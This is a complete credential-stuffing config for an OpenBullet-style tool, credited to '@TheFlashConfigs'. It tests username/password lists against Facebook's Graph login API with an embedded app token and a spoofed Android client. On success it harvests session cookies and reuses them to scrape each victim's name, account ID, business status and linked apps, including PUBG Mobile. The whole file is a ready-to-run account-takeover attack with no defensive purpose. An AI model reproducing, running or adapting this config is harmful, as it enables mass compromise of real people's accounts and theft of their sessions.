[SETTINGS]
{
  "Name": "Facebook Config By ⚡️Ꭲhᴇ Ꮀlᴀsh⚡️",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-04-13T15:43:57.4419678+05:30",
  "AdditionalInfo": "",
  "Author": "⚡️Ꭲhᴇ Ꮀlᴀsh⚡️",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://graph.facebook.com/auth/login" 
  CONTENT "{\"locale\":\"en_US\",\"format\":\"json\",\"email\":\"<USER>\",\"password\":\"<PASS>\",\"access_token\":\"1792792947455470|f43b4b4c85276992ac952012f8bba674\",\"generate_session_cookies\":1}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: graph.facebook.com" 
  HEADER "user-agent: Dalvik/2.1.0 (Linux; U; Android 10; Redmi Note 7 Pro MIUI/V12.5.1.0.QFHINXM) [FBAN/Bishop Android;FBAV/3.1.0.0.0;FBBV/155716422;FBRV/0;FBLC/en_US;FBMF/Xiaomi;FBBD/xiaomi;FBDV/Redmi Note 7 Pro;FBSV/10;FBCA/armeabi-v7a:armeabi;FBDM/{density=2.75,width=1080,height=2217};FB_FW/1;]" 
  HEADER "content-type: application/json;charset=utf-8" 
  HEADER "accept-encoding: gzip" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The parameter email is required" 
    KEY "We limit how often you can post, comment or do other things in a given amount of time to help protect the community from spam. You can try again later. Learn More" 
    KEY "Invalid username or email address" 
    KEY "Invalid username or password" 
  KEYCHAIN Success OR 
    KEY "session_key" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "User must verify" 

PARSE "<SOURCE>" LR "\"session_cookies\":" ",\"identifier\":" -> VAR "Cookie" 

PARSE "<SOURCE>" LR "c_user\",\"value\":\"" "\"" -> VAR "CUS" 

PARSE "<SOURCE>" LR "fr\",\"value\":\"" "\"" -> VAR "FR" 

PARSE "<SOURCE>" LR "datr\",\"value\":\"" "\"" -> VAR "DTR" 

PARSE "<SOURCE>" LR "xs\",\"value\":\"" "\"" -> VAR "X" 

FUNCTION URLEncode "<X>" -> VAR "XS" 

REQUEST GET "https://m.facebook.com/?refsrc=https%3A%2F%2Fm.facebook.com%2F&_rdr" 
  
  HEADER "Host: m.facebook.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://m.facebook.com/login/save-device/?login_source=login" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: datr=<DTR>; fr=<FR>; sb=3lMpYKwYO6_QcWBti1wPKbjK; m_pixel_ratio=1; wd=1284x422; c_user=<CUS>; xs=<XS>" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "TE: Trailers" 

PARSE "<SOURCE>" LR "\",\"NAME\":\"" "\"" CreateEmpty=FALSE -> CAP "Full Name" 

PARSE "<SOURCE>" LR ",\"IS_BUSINESS_PERSON_ACCOUNT\":" "," CreateEmpty=FALSE -> CAP "Business Account" 

PARSE "<SOURCE>" LR "\"ACCOUNT_ID\":\"" "\"" CreateEmpty=FALSE -> CAP "Account ID" 

REQUEST GET "https://www.facebook.com/settings?tab=applications&ref=settings" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Host: m.facebook.com" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://m.facebook.com/login/save-device/?login_source=login" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: datr=<DTR>; fr=<FR>; sb=3lMpYKwYO6_QcWBti1wPKbjK; m_pixel_ratio=1; wd=1284x422; c_user=<CUS>; xs=<XS>" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "TE: Trailers" 

PARSE "<SOURCE>" LR "\",\"app_name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Linked APPS" 

IF "<Linked APPS>" Contains "PUBG Mobile"

#true FUNCTION Constant "TRUE✔️" -> CAP "Have Pubg =" 

ELSE

FUNCTION Constant "TRUE ✅" -> CAP "Account has Full Access :" 

FUNCTION Constant "FALSE✂️" -> CAP "ACCOUNT IS DISABLE :" 

FUNCTION Constant "<Cookie>" -> CAP "Cookies" 

FUNCTION Constant "@TheFlashConfigs" -> CAP "Config By" 

